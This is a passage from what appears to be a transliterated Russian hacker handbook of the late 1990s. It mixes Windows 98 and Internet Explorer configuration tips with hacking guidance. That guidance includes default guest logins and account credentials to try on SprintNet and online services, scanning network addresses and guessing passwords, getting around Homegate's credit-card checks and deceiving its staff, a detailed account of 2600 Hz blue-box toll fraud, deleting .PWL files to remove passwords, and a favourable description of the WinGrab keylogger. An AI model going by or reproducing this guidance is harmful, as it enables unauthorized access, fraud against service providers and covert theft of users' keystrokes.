     204.118.34.11 i otklyuchite ispol'zovanie DHCP dlya
     raspoznovaniya WINS
     n Konfiguraciya DNS: Otklyuchit' DNS
     Ostav'te vashe pervoe soedinenie udalennogo dostupa v pokoe  i nastrojte
vtoroe soedinenie  udalennogo  dostupa.  V kachestve tipa  servera udalennogo
dostupa ukazhite
     PPP: Internet,  Windows  NT Server,  Windows  98,  a  v  dopolnitel'nyh
parametrah otmet'te Programmnoe szhatie dannyh. V kachestve dopustimyh setevyh
protokolov ukazhite  tol'ko  TCP/IP.  V  nastrojkah TCP/IP opcii  IP-adres  i
Adresa  vvodyatsya   vruchnuyu  vyberite  v  zavisimosti  ot  instrukcij  vashego
postavshchika uslug Internet. Krome etogo, soobshchite sisteme ispol'zovat' szhatie
zagolovkov IP i standartnyj shlyuz dlya udalennoj seti.
     Pomnite,  chto server www.msn.com  k  uslugam MSN imeet otnoshenie ves'ma
otdalennoe.
     Set' Sprint Network
     Set'  SprintNet   --  global'naya  set'  kommutacii  paketov,  odna   iz
krupnejshih v  mire v nastoyashchee vremya.  Cet' Sprint yavlyaetsya neposredstvennym
razvitiem seti  Telenet --  odnoj  iz pervyh obshchedostupnyh setej  kommutacii
paketov.
     Vladel'cami   seti  yavlyayutsya   krupnye  amerikanskie   kommunikacionnye
kompanii
     UTI i GTE. Ih dochernej kompanii US Sprint prinadlezhit krupnejshaya v mire
set' optovolokonnyh kanalov, sostavlyayushchaya osnovu Sprint. K Sprint podklyucheno
okolo  6000 host-komp'yuterov i shlyuzov (gates)  drugih  firm  i  organizacij,
predostavlyayushchih     raznoobraznye    spravochno-informacionnye    uslugi    i
obespechivayushchih vyhod v drugie seti.
     |ta set'  schitaetsya  bezopasnoj, tak kak pri  rabote  s  nej nevozmozhna
poterya informacii.  Pri  rabote  s  elektronnoj  pochtoj vam  predostavlyaetsya
special'nyj "yashchik" na servere,  kotoryj podklyuchen s pomoshch'yu teleprocessora k
sisteme elektronnoj pochty. Sama sistema maksimal'no  produmana i imeet massu
komand. Pod  nee  takzhe est' i licenzionnoe programmnoe obespechenie, kotoroe
stavitsya na vash komp'yuter vmeste s set'yu.
     Rabota  s  set'yu  Sprint  vedetsya  s  pomoshch'yu  protokola  H25,  kotoryj
obespechivaet pol'zovatelyam virtual'nyj  kanal.  |to  znachit, chto kazhdyj port
seti imeet  svoj adres, i  esli na  drugom adrese  nahoditsya  komp'yuter,  to
zaprosto mozhno k  nemu podklyuchit'sya. Dlya peredachi  vse dannye razbivayutsya na
porcii  i  peredayutsya otdel'nymi liniyami po  odnomu kanalu. Kompleks  Sprint
effektivno ispol'zuet  sistemy  svyazi,  udeshevlyaya stoimost'  zadejstvovannyh
resursov i pri etom pozvolyaet uskorit' rabotu s set'yu.
     Deviz  Sprint --  konfidencial'nost'.  Fizicheski i apparatno nevozmozhno
prosledit' informaciyu, peredavaemuyu set'yu. O soderzhanii fajlov smogut uznat'
tol'ko te, komu oni neposredstvenno prednaznachayutsya. Nikto nikogda ne uznaet
adresa, imeni i drugih svedenij o vas, esli vy etogo ne pozhelaete.
     Zvonok na Sprint osushchestvlyaetsya  samoj obychnoj  tepminalnoj programmoj.
Vy nabipaete  nomep Sprint (928-6344, 928-0985, 342-8376, 913-7166, 578-9119
ili 578-9161) i posle soedineniya tepminal govopit CONNECT 9600/ARQ/V34b.
     Dal'she vam sleduet nabpat' @D i nazhat' enter. Vyvedutsya stpoki:
     SPRINT NETWORKS
     772 11001A
     TERMINAL=(vvedite D1)
     772 -- eto kod stpany, po  Rossii i SHG.  11001A  -- eto nomep hosta, s
kotopogo  vy voshli.  To est',  poluchiv  otvet nappimep 772  11001F vy dolzhny
podozpevat', chto sushchestvuyut hosty 11001A,B,C,D. To est', vozmozhno sushchestvuyut
eshche telefony Sprint v vashem gopode.
     Posle @  vy dolzhny  nabpat'  nomep seti -- NUA -- Network User Address,
t.e.  chislo,  zadayushchee  setevoj   adres  pol'zovatelya.   NUI  (Network  User
Identificator) -- kod  dostupa i parol'. DNIC (Data  Network  Identification
Code) --  kod  seti,  predstavlyaet iz  sebya chetyre cifry, kotorye  v  polnom
setevom adrese zadayut kod seti dannyh.
     Esli u vas net ID i parolya, poppobujte vvesti sleduyushchee:
     login: guest/demo/new/bbs/help/info/newuser/anonymous/test
     passw: guest/demo/new/bbs/help/info/newuser/anonymous/test
     Sprint vhodit v sostav konsopciyma  Global  One,  kak  i drugie krupnye
seti kommutacii paketov: SITA aka SCITOR, Infonet, Tymnet  i  drugie. Global
One  imeet  ppedstavitel'stvo  (kak elektponnoe  tak i  fizicheskoe) v kazhdoj
kpypnoj stpane (modemnyj  telefon:  967-6767,  golosovoj telefon:  705-9170,
adpes domena: global-one.net)
     Esli haker vzlomaet imenno sppintovyj xost, to ego mogut i privlech', no
eto v eavisimosti  ot togo kak gluboko on zalez, i znayut  ob etom ili net. A
esli haker paskovypyal  kakuyu-libo setku ili chto-nibud' eshche chepez  Sprint, to
vpyad li. Sprint  naplevat' kto chepez nego bpodit.  Ppoblemy mogut vozniknut'
ot togo k komu zalez haker.
     V    Internet   mozhno   uznat'   ob    uslugah   seti    Sprint   cherez
http://www.sprint.com, http://www.sprintlink.net ili http://www.rosprint.ru.
     CHerez Sprint dostupny sleduyushchie sluzhby:
     CompuServe Network
     Address: 202 202
     User ID: 177000,1005
     Password: EXPLORE/WORLD
     Program: WinCIM v3.0
     Dlya  soedineniya s  Compuserve Network  (a ne s samim Kompuservom) cherez
Sprint, nuzhno  vvesti  te  zhe  X.25  adresa (chto i  dlya  Kompuserva),  no  s
ukazaniem pyatogo porta: 202201E (ili 202201.05), 202202E, 202203E,  614227E.
Kak poyavitsya priglashenie Host, vvedite mnemoniku N2KRF1.
     Microsoft Network
     Address: 03110 83501000
     Program: MSN v5900
     America On-Line
     Address: 83420178.83
     User name: 2230033368
     Password: ELITES-GOLF
     Program: America On-Line v3.0
     GEnie
     Address: unpublished
     User ID: only god knows
     Program: telix
     Ckanirovanie  Sprint -- posledovatel'nyj perebor adresov (NUA).  Delat'
eto vruchnuyu  ochen'  dolgo -- dlya etogo  ispol'zuyutsya raznoobraznye programmy
ili skripty.
     Luchshaya -- Sprintnet Scanner v1.5.
     Set' Dialog
     Dialog  yavlyaetsya  odnoj iz  samyh  obshirnyh  informacionnyh  sluzhb.  Na
segodnyashnij den' Dialog predostavlyaet dostup k bolee chem 600 bazam dannyh. V
Rossii sushchestvuet neskol'ko  setej,  imeyushchih  svobodnyj  (Reserved Charging)
vyhod  na sluzhbu Dialog  i dazhe  rabotaet  mnemonika (DIALOG)! Coedinit'sya s
Dialogom   mozhno   cherez   SprintNet   (mnemonika:   DIALOG,  X.25   adresa:
0311041500048, 0311041500049,  0311041500020).  Posle soedineniya  vy uvidite
priglashenie:  DIALOG  INFORMATION SERVICES.  Login,  kak  pravilo,  yavlyaetsya
shestiznachnym nomerom,  a paroli obychno imeyut dlinu vosem' znakov (bol'shie  i
malen'kie  bukvy  chereduyutsya  s  chislami).  Esli  parol'  ugadan,  to  posle
nekotoryh soobshchenij vy poluchite prompt - "?"
     Nomera nekotoryh baz dannyh seti Dialog:
     75 Management Contents
     201 ERIC
     204 CA Search
     205 BIOSIS Privews
     208 Compendex
     213 INSPEC
     215 ABI/INFORM
     216 PTS Prompt
     229 Drug Information
     231 CHEMNAME
     247 Magazine Index
     250 CAB Abstracts
     254 Medline
     290 Dialindex
     296 TrademarkScan
     K etim bazam dannyh vozmozhen dostup s  pomoshch'yu klientskogo softa Knight
Reader i Dialoglink:
     ftp://iserv.dialog.com/pub/WWW/quickstart/setup.exe
     ftp://iserv.dialog.com/pub/WWW/dlkdos.exe
     ftp://iserv.dialog.com/pub/WWW/dlkdos.zip
     ftp://iserv.dialog.com/pub/WWW/dlkwin.exe
     Tehnicheskaya  podderzhka  Dialoga  dostupna  besplatno  cherez  rossijskih
operatorov MCI ili AT&T ili Sprint Global-One.
     Set' Homegate
     Homegate -- yavlyaetsya dochernej kompaniej I-Pass i predostavlyaet dostup k
Internet  prakticheski  vo  vseh  stranah mira  po  protokolu H.28 cherez Sita
network,  BBN Network i  UUNET. V  Rossii  set' Homegate dostupna cherez set'
Sita NetWork (Equant).  Dialer soedinyaet vas  s serverom korporacii  I-Pass,
gde  i  proishodit proverka  parolya. Dlya prohozhdeniya registracii  v Homegate
neobhodimo uzhe imet' vhod v Internet, i nahodyas' na linii zapustit' Homegate
Dialer,  zatem  nazhat'  v dialere  knopku  Register  (zapustitsya  brauzer  i
soedinit hakera s sajtom registracii).
     Posle prohozhdeniya registracii hakeru budet poslan fajl s ID i parolem.
     Kreditka proveryaetsya  ne  vo  vremya, a posle prohozhdeniya registracii, v
techenii  10-20  minut,  poetomu podbirat'  prefiksy  --  gibloe delo.  Haker
uznaet, proshel on registraciyu  ili net tol'ko  po  istechenii etogo  vremeni,
pozvoniv s pomoshch'yu Homegate Dialer.
     Esli  haker  voshel v  Internet ,  to  prohodit'  registraciyu neobhodimo
kazhdye dva dnya,  tak kak vse dogovora, zaklyuchennye v Rossii, preryvayutsya dlya
"rassledovaniya".
     CHtoby ne pereustanavlivat'  Homegate Dialer dlya povtornoj  registracii,
hakeru dostatochno udalit' fajly user.idx i user.dat.
     Esli pis'mennyj anglijskij hakera dostatochno krasnorechiv, chtoby ubedit'
administraciyu seti Homegate v  tom, chto on amerikanec, nahoditsya  v Rossii i
vozmushchen  podobnym  nebrezhnym  otnosheniem,  to hakeru  bez  osobyh  problem,
obratno aktiviruyut dostup.
     Pis'mo  pishetsya  ne  v  HELPDESK@HOMEGATE.COM, a  pryamo na tot adres  s
kotorogo hakeru  prishlo  soobshchenie  o tom, chto on  novyj pol'zovatel'.  Esli
haker udachno prodelaet vse eti procedury, u nego budet dostup v Internet uzhe
cherez pervyj prozvon s CPS do 4000.
     Programmu       Homegate      Dialer       haker       zagruzhaet      s
http://www.homegate.com/howget
     Proksi v Microsoft Internet Explorer
     S pomoshch'yu razdela Proksi-server vy mozhete podklyuchit'sya k Internet cherez
proksi-server vashej lokal'noj  seti. Dlya etogo postav'te flazhok Podklyuchat'sya
k  Internetu  cherez  proksi-server  i  vvedite  v polya  dannyh  Adres  adres
proksi-servera, a v pole dannyh Port zadajte nomer porta.
     V obshchem sluchae,  obozrevatel'  Microsoft Internet  Explorer  ne trebuet
parametrov blizlezhashchih uzlov ili tak nazyvaemyh proksi-serverov, to est' teh
setevyh  sluzhb,  cherez kotorye  vy neposredstvenno rabotaete  s Internet.  S
drugoj  storony,  konfiguraciya  nekotoryh  setevyh   soedinenij  blokiruetsya
brandmauerami.   Kak   izvestno,  informaciya  zashchishchaetsya   brandmauerami   v
komp'yuterah  vnutrennih  setej ot vseobshchego dostupa.  Pri etom,  brandmauery
mogut  ogranichivat'  sposobnost' Microsoft  Internet  Explorer  obmenivat'sya
informaciej  s  vneshnimi  istochnikami.  CHtoby  preodolet'  eto  ogranichenie,
Microsoft Internet  Explorer  pozvolyaet vam vzaimodejstvovat' tol'ko  s  tem
programmnym obespecheniem,  kotoroe vam predostavlyaet vash  provajder Internet
ili glavnyj server vashej lokal'noj seti. Vse eto  delo rabotaet po mudrennoj
sheme.
     Proksi-server retransliruet brandmauer i obespechivaet svyaz'  s zadannym
protokolom setevoj  sluzhby.  Poetomu, esli  vy zapustili  Microsoft Internet
Explorer cherez brandmauer, vam neobhodimo ukazat' nomera logicheskih portov i
associirovat' nomer  kazhdogo porta pod sootvetstvuyushchuyu sluzhbu servera.  Esli
zhe vy ne hotite ustanavlivat' parametry retranslyatora, prosto snimite flazhok
Podklyuchat'sya k Internetu cherez proksi-server.
     Vy mozhete  vruchnuyu opredelit'  sluzhby  i  zadat' nomera sootvetstvuyushchih
logicheskih   portov  vashego  proksi-serevera.  Dlya   etogo  nazhmite   knopku
Dopolnitel'no  i  v  dialogovom  okne  Parametry  proksi-servera  ustanovite
parametry dlya kazhdoj  sluzhby Internet  i ukazhite  servisnye sluzhby,  kotorye
podderzhivaet retranslyator. Imi mogut byt':
     n HTTP (HyperText Transfer Protocol)
     n FTP (File Transfer Protocol)
     n Gopher
     n Security (Secure Sockets Layer protocol)
     n WAIS (Wide Area Information System)
     n SOCKS (Sokety)
     V polyah dannyh  Adres  proksi-servera vy  dolzhny ukazat' imya  hosta dlya
kazhdogo protokola sootvetstvuyushchej sluzhby.
     Kak pravilo, odin proksi-server rabotaet s tremya osnovnymi protokolami:
HTTP, FTP  i Gopher. V  pole  dannyh  Adres  proksi-servera vy  takzhe mozhete
vvesti IP-adres proksi-servera.
     Na odnom komp'yutere mozhet byt' zapushcheno neskol'ko setevyh sluzhb, kazhdaya
iz  kotoryh  identificiruetsya   logicheskim  portom.  |tot  port  prinadlezhit
proksi-serveru,  takomu  kak  HTTP  ili   FTP.   Kak  pravilo,  v   Internet
ispol'zuyutsya  standartnye nomera logicheskih portov. Naprimer,  protokol HTTP
ispol'zuet 80-j port, a FTP -- 21-j.
     Vy mozhete  soobshchit'  obozrevatelyu,  chtoby on ne  ispol'zoval  parametry
setevyh  sluzhb  lokal'nogo  domena.  Naprimer,  esli  vy  opredelite v Adres
proksi-servera   bob.leon.com   i   ukazhite   v   pole   dannyh   Isklyucheniya
abob,bbob,leon.com,  to vse neobhodimye  protokoly  HTTP  dlya  abob, bbob  i
leon.com  budut  ispol'zovat'sya  napryamuyu,   to  est'   ignoriruya  parametr,
vvedennyj v pole Adres proksi-servera.
     Razdel Avtomaticheskaya  nastrojka prednaznachen  dlya  ves'ma  prodvinutyh
pol'zovatelej.  CHerez  knopku  Nastrojka  proishodit   obrashchenie  k  dialogu
Avtomaticheskaya nastrojka, s  pomoshch'yu kotorogo sistemnyj administrator  vashej
seti mozhet zagruzit' fajl nastroek Internet Explorer. Kak pravilo,  v  takoj
fajl  vklyuchayutsya  nekotorye parametry  raboty  Internet Explorer, kasayushchiesya
nachal'noj stranicy i nastroek proksi-servera.
     Sistema bezopasnosti Microsoft Internet Explorer
     V  dialogovom okne Svojstva  obozrevatelya cherez vkladku Bezoposnost' vy
mozhete  ustanovit'  parametry  raboty   s  sistemoj  bezopasnosti  Microsoft
Internet Explorer.
     V Microsoft Internet Explorer imeetsya, myagko govorya, nebol'shaya lazejka,
pozvolyayushchaya  perekonfigurirovat'  ego brandmauer, tak kak vy eto  pozhelaete.
Imenno cherez etot preslovutyj brandmauer  vy mozhete, naprimer,  bez  osobogo
truda vakcinirovat' sistemu. Kstati, eto  mnogimi i  ochen' mnogimi delalos'.
Prichem,  vzlom  zashchity Microsoft  Internet  Explorer mozhet byt'  osushchestvlen
neskol'kimi sposobami, kazhdyj iz kotoryh sovershenno ne svyazan s predydushchimi.
Microsoft Internet Explorer  dazhe ne opredelit togo, kto hotel vzlomat' vashu
sistemu. V etoj programme  nevozmozhno opredelit' tak nazyvaemuyu  zonu riska.
Poetomu,   imenno  cherez  brandmauery  Microsoft  Internet  Explorer  ishchutsya
otpravnye tochki zahvata vsej sistemy.  Naprimer, prostejshaya ataka programmoj
rlogin  cherez  otdel'nyj komp'yuter bol'shoj seti pozvolyaet perecherknut' dvumya
zhirnymi  polosami nizhepublikuemoe opisanie  opcij  sistemy  zashchity Microsoft
Internet Explorer.
     Izmenenie imeni pol'zovatelya i kompanii v Windows 98
     Esli vy hotite  izmenit' imya pol'zovatelya i kompanii, otkrojte redaktor
reestra v HKEY_LOCAL_MACHINE/
     SOFTWARE/MICROSOFT/WINDOWS.  Dvazhdy  shchelknite  levoj  klavishej myshi  na
klyuche REGISTERED OWNER ili
     REGISTERED ORGINIZATION i prosto vvedite novoe imya.
     Ustanovka svyazi po modemu mezhdu dvumya udalennymi komp'yuterami v Windows
98
     Esli vy  hotite  ustanovit'  svyaz'  po  modemu  mezhdu  dvumya udalennymi
komp'yuterami,  to  prezhde  vsego  komp'yuter, s kotorym vy pytaetes' naladit'
svyaz'  dolzhen  byt'  serverom  udalennogo   dostupa.  (Udalennyj  dostup   k
Soedineniya k Server udalennogo dostupa k Allow caller access).
     Teper'  sozdajte  soedinenie  udalennogo   dostupa  i  nazhmite   knopku
Ustanovit' svyaz'.
     Ustanoviv  svyaz', cherez  Moj komp'yuter  poklyuchite k  svoemu  komp'yuteru
dostupnyj setevoj disk ishodnogo servera udalennogo dostupa, zadav ego tak:
     \\\
     HyperTerminal i dva udalennyh komp'yutera v Windows 98
     n otkrojte programmu HyperTerminal
     n na odnom iz komp'yuterov otmenite zvonok
     n ustanovite "soedinenie" s udalennym komp'yuterom
     n naberite ATS0=N (N -- kolichestvo zvonkov pered
     snyatiem trubki), vash modem pereshel v rezhim ozhidaniya
     n teper' drugoj komp'yuter dolzhen nabrat' vash telefonnyj
     nomer
     Udalenie parolya v Windows 98
     Dlya togo, chtoby udalit' parol', najdite fajl s rasshireniem .PWL v papke
Windows, unichtozh'te ego i perezapustite sistemu.
     Izmenenie adresa IP bez perezagruzki sistemy v Windows 98
     Esli vy hotite  izmenit' adres IP  bez perezagruzki sistemy, otkrojte v
Redaktore                 reestra                 razdel                 Moj
komp'yuter\HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP   i
sohranite etot  razdel  kak fajl s rasshireniem  .REG.  Posle etogo  izmenite
adres  IP,  otkrojte  Provodnik i zapustite otredaktirovannyj  takim obrazom
fajl  dvojnym  shchelchkom klavishej  myshi. Esli  na  ekrane poyavilos'  soobshchenie
"Zapisi uspeshno  vneseny v reestr", to vy izmenili adres IP bez perezagruzki
sistemy.
     Ustanovka dvuh interfejsov IP na odin setevoj adapter v Windows 98
     Esli  vy hotite ustanovit' dva interfejsa IP  na odin  setevoj adapter,
prosto  dobav'te  eshche  odin protokol  TCP/IP i nastrojte  ego cherez  vkladku
Konfiguraciya dialogovogo okna svojstv Set'.
     Windows 98 i modem na COM4
     Pri   pravil'noj  ustanovke  dzhamperov,  sistema  sposobna   proizvesti
pravil'nuyu konfiguraciyu vashego modema posredstvom tehnologii avtomaticheskogo
raspoznavaniya ustrojstv. No inogda sluchaetsya tak, chto COM-portov ne hvataet,
a vam neobhodimo ustanovit' modem. Togda ostaetsya tol'ko
     odno -- podklyuchit' eto ustrojstvo na tretij ili chetvertyj
     COM-port.  Tut-to  vam  i  nuzhno  uchest'  odinakovye  preryvaniya   IRQ.
Naprimer,   preryvanie   chetvertogo  COM-porta  mozhet  byt'   zanyato   vashim
videoadapterom,  a  pervyj  COM-port  vsegda  imeet  v otnoshenii  preryvanij
bol'shij prioritet po sravneniyu s chetvertym COM-portom.
     Esli sistema voobshche ne vidit chetvertyj COM-port, prover'te eshche raz  vse
dzhampera i prosto zastav'te Windows 98 obnovit' apparatnuyu bazu dannyh.
     Zashchity sistemy v Windows 98
     Koncepciya  bezopasnosti  komp'yutera   podrazumevaet  zashchitu   vseh  ego
komponentov -- apparatnye sredstva i  prilozheniya -- ot  nesankcionirovannogo
dostupa  iz  lokal'noj seti  ili  Internet. V Windows 98  lyuboj pol'zovatel'
vashego   komp'yutera  mozhet  zaregistrirovat'sya  v  sisteme.  Pri   etom  imya
pol'zovatelya i parol' mogut byt' takimi zhe, kak i pri vhode v set'.
     Koncepciya bezopasnosti  v Windows  98 ves'ma primitivna. V etoj sisteme
vy,  kak  administrator,  ne mozhete  sozdat'  gruppu  pol'zovatelej, zavesti
uchetnuyu  zapis' pol'zovatelya,  izmenit'  prava  pol'zovatelya. Vmesto  ves'ma
prodvinutogo   Dispetchera  pol'zovatelej  eta  sistema  predlagaet  dovol'no
prosten'koe dialogovoe okno svojstv Paroli.
     Vse eto,  konechno zhe, oznachaet, chto Windows  98 voobshche ne  obespechivaet
nikakogo urovnya bezopasnosti.  Vy, kak vladelec  sobstvennogo komp'yutera, ne
mozhete   upravlyat'   sobstvennymi   resursam,   zavodit'   zhurnal   sobytij,
ogranichivat'  dostup  k  tomu  ili  inomu  resursu.  Vy  nichego  ne  mozhete!
Identifikator pol'zovotelya ID? Net! |ti veshchi mozhno delat' tol'ko v
     Windows NT.  SID!  SID!  SID! SID!  SID! SID! SID!  Zabyt' i  vse  tut!
Nikakih kodov bezopasnosti! Dostup tol'ko v NT!
     Ne vy,  a sama  sistema mozhet sozdat'  nechto,  napominayushchee  unikal'nuyu
zapis',  kotoraya   identificiruet   togo   ili   inogo  pol'zovatelya  vashego
komp'yutera.
     Nikakogo kontrolya, ucheta i otslezhivaniya.
     Vy, konechno,  administrator!  No  koncepciya  bezopasnosti Windows 98 ne
podrazumevaet tot fakt, chto vy imeete zakonnoe pravo rasporyazhat'sya resursami
sobstvennogo komp'yutera.
     Rech' idet o  tom,  chto mehanizm bezaposnosti  v Windows  98  realizovan
tol'ko na urovne registracii pol'zovatelya.
     Vam  predlagaetsya  tak   nazyvaemaya  unificirovannaya  registraciya.  |to
oznachaet, chto odnazhdy  vvedennyj ekkaunt (parol' i imya pol'zovatelya) v  okne
registracii pri  zagruzke sistemy  ispol'zuetsya dlya dostupa ko vsem sluzhbam,
prilozheniyam i apparatnym resursam vashego komp'yutera.
     Horosho podobrannyj parol', v  principe, sposoben zashchitit'  vashu sistemu
ot proniknoveniya v nee nezhdannyh gostej. Poetomu:
     n nikogda ne zapisyvajte svoj parol' na bumage

     n ne pol'zujtes' ochevidnymi parolyami
     (imena, nazvaniya gorodov)
     n nikogda ne otpravlyajte svoj parol' po elektronnoj
     pochte
     n ispol'zujte razumnoe kolichestvo simvolov pri
     sostavlenii parolya, inache vy zabudete ego v odin
     prekrasnyj moment i ne smozhete izmenit' nikogda
     S  pomoshch'yu vkladki Smena parolej  dialogovogo  okna  svojstv Paroli,  k
kotoromu  vy  mozhete  obratit'sya  iz  Paneli upravleniya posredstvom dvojnogo
shchelchka klavishej myshi na znachke Paroli, izmenyayutsya parametry  unificirovannoj
registracii  vseh  resursov  vashego komp'yutera  posredstvom  zadaniya  novogo
parolya pol'zovatelya.
     Zadat'  novyj  parol'  mozhno  cherez  vkladku   Nastrojka  pol'zovatelya,
obratit'sya k kotoroj vy mozhete posredstvom dvojnogo  shchelchka klavishej myshi na
piktogramme Pol'zovateli, nahodyashchejsya v Paneli upravleniya.
     Esli  vy hotite  ustanovit'  zashchitu  na  tot  ili  inoj  resurs  vashego
komp'yutera, naprimer, razdelit'  dostup k  fajlam i printeram, prezhde vsego,
sdelajte tak, chtoby etot resurs stal razdelyaemym.
     Bolee  podrobnuyu   informaciyu   vy   mozhete   poluchit'   u   sistemnogo
administratora vashej kompanii.
     Windows   98   pozvolyaet    upravlyat'   resursami   vashego   komp'yutera
pol'zovatelyam, kotorye imeyut udalennyj dostup k  vashej sisteme. Dlya etogo vy
dolzhny  dobavit' sootvetstvuyushchuyu sluzhbu s pomoshch'yu vkladki Set', obratit'sya k
kotoroj vy mozhete iz Paneli upravleniya. Tol'ko posle etogo v dialogovom okne
svojstv Paroli poyavitsya novaya vkladka Udalennoe upravlenie.
     Naezd na web-mastera
     Puteshestvuya po Internet, vy, navernoe, obratili vnimanie  na  razlichnyj
vid  web-stranic.  Nekotorye  stranicy vyglyadyat ves'ma krasivo  i  do otkaza
zapolneny  nuzhnoj vam  informaciej.  Drugie  -- bezobrazny,  otvratitel'ny i
zapolneny, kak pravilo, vsyakoj erundoj. Razrabotkoj i  teh i  drugih stranic
zanimayutsya  pol'zovateli, nazyvayushchie sebya web-dizajnerami ili web-masterami.
Ponyatno, chto horoshij  web-dizajn  napryamuyu zavisit ot togo, kak pol'zovatel'
vladeet intellektual'noj disciplinoj, nazyvaemoj web-dizajnom.
     Esli vy programmist,  nikogda ne puskajtes' v avantyury tipa "Razrabotka
web-servera". Pover'te,  eto ne dlya vas. Web-dizajn  --  eto daleko ne  kody
HTML!  Imenno na etih samyh kodah zaciklivayutsya mnogie programmisty, zabyvaya
pro
     glavnoe   --    krasivyj   dizajn,   funkcional'nost'   i   soderzhanie.
Professional'nyj dizajn web-stranichek i  serverov WWW ne mozhet byt' vypolnen
programmistom.
     Zachem vam nuzhen Domain Name Server
     Kazhdoe  podrazdelenie Internet  imeet dva  domena. Osnovnoj DNS  obychno
raspolagaetsya na setevoj mashine.
     DNS-servera  ispol'zuyut v svoih obrashcheniyah k udalennym  uzlam 32-bitnye
adresa IP, mnemonicheski zaklyuchennye v chetyrehrazryadnuyu bukvennuyu kombinaciyu.
Lyuboj  host mozhet  poluchit' sootvetstvuyushchij DNS u blizhajshego informacionnogo
servera DNS  po izvestnoj  sisteme Domain Name Server cherez setevoj protokol
DNS.  Prosto  host  posylaet  zapros na izvestnyj IP-adres DNS-servera  svoj
IP-adres  i imya  servera.  Server  DNS  shtudiruet  sobstvennuyu  bazu dannyh,
nahodit  IP-adres  i  otpravlyaet  na  host sootvetstvuyushchij otvet  DNS. Shema
ves'ma  primitivnaya.  Esli  zhe  server  DNS  ne  nahodit  iskomuyu  bukvennuyu
kombinaciyu,  to  on  otsylaet zapros  na  tak  nazyvaemyj  kornevoj  server,
kotoryj, v svoyu  ochered', sveryaet informaciyu s fajlom  nastroek  root.cache.
Tak proishodit do teh por, poka imya hosta ne budet najdeno v Internet.
     Principy dejstviya BlueBox
     Upravlenie   priborami   na   ATS  (nabor  nomera,   sostoyanie   linii)
osushchestvlyaetsya   postoyanym   tokom.   Odnako   eto  spravedlivo  tol'ko  dlya
abonentskih linij i chastichno -- dlya soedinitel'nyh. V mezhuzlovoj seti, kak i
v  mezhdugorodnoj, stoit  apparatura uplotneniya  kanalov, usileniya signalov i
t.p.,  kotoraya ne  mozhet peredavat'  postoyannyj  tok. Odnako stancii  kak-to
dolzhny signalizirovat' o svoem sostoyanii drug-drugu. Dlya etoj celi primenyayut
razlichnye  sistemy  signalizacii. Dlya  dvuhprovodnoj  linii naibolee udobnoj
okazalas' chastotnaya signalizaciya v polose chastot telefonnogo kanala  (300 --
3500 Hz), kotoruyu propuskaet oborudovanie usileniya i uplotneniya.
     Uzly soedineny mezhdu soboj nekotorym kolichestvom soedinitel'nyh linij.
     CHtoby oboznachit', chto uzel ne zanimaet liniyu,  on  podaet  v nee signal
chastotoj 2600 Hz.  Na  svobodnoj linii etot signal  idet s obeih storon  (ot
oboih  uzlov). Kogda uzel hochet svyazat'sya s  drugim uzlom, on dolzhen vybrat'
svobodnuyu liniyu. Dlya etogo  oborudovanie prosmatrivaet po  ocheredi vse linii
na  nalichie signala 2600 Hz, postupayushchego s udalennogo uzla. Nalichie signala
oznachaet, chto liniya svobodna, i uzel podklyuchaetsya k nej. Pri etom on snimaet
signal 2600 Nz so svoej storony, chto oznachaet, chto liniya im zanyata.
     S  udalennogo uzla signal 2600  Hz vse  eshche postupaet  v liniyu.  Vy  ne
slyshite   ego,  tak  kak   na  ego   puti  ustanovlen  uzkopolosnyj  fil'tr,
"vyrezayushchij"   etot   ton.  2600  budet  podavat'sya  udalennym  uzlom,  poka
vyzyvaemyj abonent ne  snimet trubku. Nash uzel opoznaet propadanie signala s
udalennogo  uzla,   kak  priznak  togo,  chto  razgovor  nachat,  i   nachinaet
nakruchivat' za  nego  babki. Po okonchanii razgovora uzel, chej abonent veshaet
trubku, opyat' podaet v liniyu signal  2600  Nz, oznachayushchij,  chto  dannyj uzel
prekratil razgovor i osvobodil liniyu. Tak rabotaet eta sistema signalizacii.
     Teper'  predpolozhim, chto vy zvonite drugu v drugoj gorod  N.  Nabiraete
ego nomer.  Vash mezhdugorodnij uzel ishchet svobodnuyu svyaznuyu liniyu, na  kotoruyu
iz N podaetsya 2600 Hz. Najdya takuyu liniyu, on  soedinyaet vas  s nej i ubiraet
so svoej storony  signal  2600 Hz.  Uzel  goroda  N ponimaet eto kak  zapros
nachat' svyaz'. Dalee vash uzel peredaet uzlu goroda N nomer vashego druga, i vy
nakonec  slyshite gudki vyzova. U druga zvonit telefon. Vse eto vremya 2600 iz
goroda N postupaet na vash uzel, poetomu on ne  nachislyaet poka den'gi. Teper'
predpolozhim, chto  my sami  podali  v liniyu  signal 2600  Hz. Uzel  goroda  N
"slyshit"  etot  ton  i  dumaet, chto  vy u sebya  povesili trubku, i  vash uzel
osvobodil   liniyu.   Sootvetsvenno  on  prekrashchaet  vyzyvat'  vashego  druga,
sbrasyvaet i  gotovit oborudovanie  k  novym vyzovam (eto zanimaet ne  bolee
sekundy). Teper' vy perestaete podavat' ton  2600  Hz. Uzel goroda N dumaet,
chto  s vashego  uzla prishel novyj zapros  na  svyaz', i gotov  prinimat' nomer
abonenta. Pri etom,  blagodarya zvezdoobraznoj  strukture seti, uzel goroda N
mozhet  svyazyvat'sya s  drugimi gorodami  i  stranami,  esli  nabiraemyj nomer
soderzhit kod strany i/ili goroda.
     Takim  obrazom,  pozvoniv  snachala  v  sosednij gorod  N  i  perehvativ
upravlenie  set'yu,  vy  mozhete zvonit' v lyuboe mesto,  kuda smozhet "zvonit'"
uzel  goroda N.  Pri  etom vash uzel zaregistriruet tol'ko zvonok v gorod N i
nichego  ne  budet znat'  o dal'nejshih  vashih  dejstviyah. Znachit,  po  tarifu
sosednego gorodka vy mozhete  zvonit' prakticheski v  lyubuyu stanu mira. Zvonok
mozhet byt' i voobshche besplatnym, esli vy snachala nabiraete nomer kakoj-nibud'
vserossijskoj besplatnoj sluzhby.
     S®emshchik parolej Wingrab
     Ves'ma interesnaya  hakerskaya programma WinGrab  prednaznachena dlya s®ema
vsyakoj raznoj  informacii  s  komp'yuterov, rabotayushchih  pod  Windows  95  ili
Windows  NT.  |ta  programma  pozvolyaet  otslezhivat'  soderzhimoe Windows  po
goryachim slovam, a takzhe klaviaturnyj vvod. Informaciya sobiraetsya v lokal'nom
fajle ili mozhet byt' peredana cherez Internet na ukazannyj FTP-server.
     Poslednyaya versiya WinGrab podderzhivaet tol'ko odno dobavochnoe  slovo, no
gramotnoe  ego  primenenie  pomogaet  znachitel'no uvelichit'  krug  snimaemoj
